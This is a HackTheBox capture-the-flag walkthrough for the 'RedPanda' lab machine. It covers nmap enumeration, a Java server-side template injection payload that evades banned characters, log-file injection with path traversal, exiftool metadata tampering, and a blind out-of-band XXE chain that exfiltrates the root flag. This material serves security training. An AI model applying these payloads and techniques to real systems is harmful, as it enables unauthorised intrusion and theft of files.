RedPanda — Hackthebox walkthrough

User

Nmap gives us 2 open ports

nmap --open -sC -sV 10.10.11.170

PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
|   256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
8080/tcp open  http-proxy syn-ack
|
|_http-title: Red Panda Search | Made with Spring Boot
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS

Looking at port 8080, we get a page to search for pandas.

We can see search field that we can use. When I search for a word, I saw the input being reflected to the results page. So I started testing this for this for different vulnerabilities. After a couple of tried I got an interesting result when I used (1+1) this as the payload.

The expression got evaluated and the it resulted 2 Right away I knew I was dealing with a SSTI (Server Side Template Injection) vulnerability. So I kept trying for different payloads to identify what the templating engine it uses.

After a couple of tries, I was able to identify that its using Java.

*{T(java.lang.System).getenv()}

NOTE: If you look for a Java payload, you would see that they all have $ at the beginning. But this doesn’t. Reason for that is while I was trying different payloads, I came to notice that some characters are banned i.e $ and _ so I had to find a payload that doesn’t contain these. Therefore, I replaces $ with * and it worked.

After looking around, I was able to get a reverse shell with this payload.

You can get all the SSTI payloads I used from here.

Root

Running pspy, I saw a cron is running.

It was invoking a java application in /opt/ directory. Therefore, I looked into that directory and found the source code of the panda search application in /opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java

Looking at the source code, I saw what this was doing. So a couple of things to notice is:

1. Looking at the main() function we can see its loading the log file in /opt/panda_search/redpanda.log and passing it to the parsLog() function. Looking at that function, it just gets a line and splits according to a delimiter which is ||

2. Once its parsed, the value of uri is passed to the getArtist() function to get the name of the Artist. The way it does it that, it loads the image from the uri path given with uri and looking at the meta data for an entry called Artist Once it finds one, it return the value of the that tag.

3. Then an XML file is updated according to the artist’s name from the addViewTo() function. Here we can see that it’s using SAXBuilder to edit the XML file.

If we look at vulnerabilities for this library, we can find an XXE (External Entity Inejction) vulnerability from a crafted HTTP request that allows us to read arbitrary files.

Snyk Vulnerability Database | Snyk

Now that we know this, we can put the pieces together and start to exploit this. For that first we have to add an entry to the redpanda.log file. Because that’s where the application gets the location of the image path.

echo "200||10.10.14.101||Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0||/../../../../../../../tmp/kavi.jpg" >> redpanda.log

If you look at the path that path is used, you can see there is no input validation done. Its just appending the path we provide.

So we can use ../../../../ to escape out from that directory to specify an image we need.

After we have to add a meta data entry named Artist and set the name. Looking at the source, we can see there is no input validation here as well. So we can use the same trick to specify a XML file we need.

We can add the entry with exiftool

exiftool -Artist=../../tmp/kavi kavi.jpg

Now we need to make the XML file to exploit the XXE vulnerability. Since this is a blind XXE, we can’t use a typical payload we use. We have to use OOD (Out of Band) technique here.

The concept here is to load a DTD file which contains a malicious XML entity, read the root flag and then make a request to a server to control with the flag set as a parameter.

One thing to note when naming the XML file is that you have to name it as _creds.xml Thats because the string _creds.xml is appended to the name of the artist. With ../../tmp/kavi being the name of the artist, the location of the XML file is going to be /credits/../../tmp/kavi_creds.xml

(Find the payloads from here)

• _creds.xml

• kavi.dtd

As you see, this will get the kavi.dtd, read /root/root.txt and send it to us. Once these files are created, you have to put the XML file in /tmp. So /tmp should contain 2 files. kavi.jpg , _creds.xml You have to host the kavi.dtd file as well. Once all thats done, you just have to wait for the cron to run.

Once it runs, you should receive the flag to your server.

Contact me though social media:

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518

Happy Hacking !!! 😄